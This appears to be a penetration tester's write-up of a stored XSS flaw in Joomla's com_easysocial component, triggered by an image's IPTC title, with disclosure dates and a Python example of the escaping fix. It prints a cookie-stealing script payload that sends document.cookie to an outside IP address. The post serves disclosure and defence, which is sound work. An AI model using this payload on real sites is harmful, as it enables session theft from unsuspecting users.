Recently, during a pentest on a web application, I discovered a little bug in the Joomla component com_easysocial. Basically, the component lets people join a social network, upload photos, post messages on a wall, etc.
On one of these “social fun walls” we can upload an image that other people on the wall can see. The image has a title and a description, and the component reads the title from the image's EXIF IPTC data. The problem was that we can inject XSS through an uploaded image whose IPTC EXIF headers carry the payload: when a user visits the image, the title is parsed from the contents of the IPTC header and output without enough protection against XSS. I had no code from my client to read and confirm this, but a GitHub repo helped me a lot to figure out and confirm that the finding was real. For an example of how this component reads EXIF data, see the getIptcData and getExifFromFile functions:
With all this information we can script the typical cookie stealer as a PoC.
1. Inject the XSS code into the EXIF IPTC headers with “Exif Pilot” or whatever other software you want. As you can see, it is not a complicated payload at all, but it works. The red part is your host, where the cookie stealer is listening for the connection when a user visits the image.
The injection in the IPTC name tag could be something more elegant, but for the PoC it was OK.
Or this one.
<script>image = new Image();image.src='http://126.96.36.199/?'+document.cookie;</script>
2. On the server, prepare a cookie stealer script to capture the data and redirect the user back to the original site.
When a user visits the image on the wall, your server captures the request and saves the cookie. See it in action with an alert:
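The root cause described above, as an added example (my own code, not the component's getIptcData/getExifFromFile or the GitHub repo I mention): a small Python reader that pulls the IPTC Object Name (record 2:05) out of a JPEG APP13 segment and renders it either raw, the way the vulnerable title output behaved, or HTML-escaped, which is the fix. The JPEG bytes are constructed inline and the function names are my own.

```python
import html
import struct
# Constructed sample: minimal JPEG with one IPTC dataset, Object Name (2:05), in APP13.
def build_iptc_jpeg(title):
    value = title.encode("utf-8")
    dataset = b"\x1c\x02\x05" + struct.pack(">H", len(value)) + value
    block = (b"8BIM" + struct.pack(">H", 0x0404) + b"\x00\x00"  # 0x0404 = IPTC, empty name
             + struct.pack(">I", len(dataset)) + dataset)
    block += b"\x00" * (len(dataset) % 2)  # resource data is padded to an even length
    payload = b"Photoshop 3.0\x00" + block
    app13 = b"\xff\xed" + struct.pack(">H", len(payload) + 2) + payload
    return b"\xff\xd8" + app13 + b"\xff\xd9"

def _iptc_dataset(iptc, record, number):
    # Walk the 0x1C-tagged datasets and return the first (record, number) match.
    pos = 0
    while pos + 5 <= len(iptc) and iptc[pos] == 0x1C:
        size = struct.unpack(">H", iptc[pos + 3:pos + 5])[0]
        if (iptc[pos + 1], iptc[pos + 2]) == (record, number):
            return iptc[pos + 5:pos + 5 + size].decode("utf-8", "replace")
        pos += 5 + size
    return None

def _iptc_from_irb(irb):
    pos = 0
    while irb[pos:pos + 4] == b"8BIM":  # Photoshop image resource blocks
        res_id = struct.unpack(">H", irb[pos + 4:pos + 6])[0]
        name_len = irb[pos + 6]
        pos += 7 + name_len + ((1 + name_len) % 2)  # Pascal name, padded to even
        size = struct.unpack(">I", irb[pos:pos + 4])[0]
        if res_id == 0x0404:  # IPTC-NAA record
            return irb[pos + 4:pos + 4 + size]
        pos += 4 + size + (size % 2)
    return b""

def read_iptc_title(jpeg):
    # Scan the JPEG segment chain for APP13 (0xFFED); standalone markers not handled.
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF and jpeg[pos + 1] != 0xD9:
        length = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        segment = jpeg[pos + 4:pos + 2 + length]
        if jpeg[pos + 1] == 0xED and segment.startswith(b"Photoshop 3.0\x00"):
            return _iptc_dataset(_iptc_from_irb(segment[14:]), 2, 5)
        pos += 2 + length
    return None

def render_title(jpeg, escape=True):
    # escape=False reproduces the vulnerable pattern: metadata dropped raw into HTML.
    title = read_iptc_title(jpeg) or ""
    return "<h2>%s</h2>" % (html.escape(title, quote=True) if escape else title)
```

The point is that image metadata is attacker-controlled input like any form field, so it has to be escaped for the context it is rendered into rather than trusted because it came out of a file.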
- 27/05/2017 – Provider contacted with the issue.
- 27/05/2017 – Provider replies and works on a fix.
- 01/06/2017 – Provider releases a patch.
- 13/07/2017 – Published findings.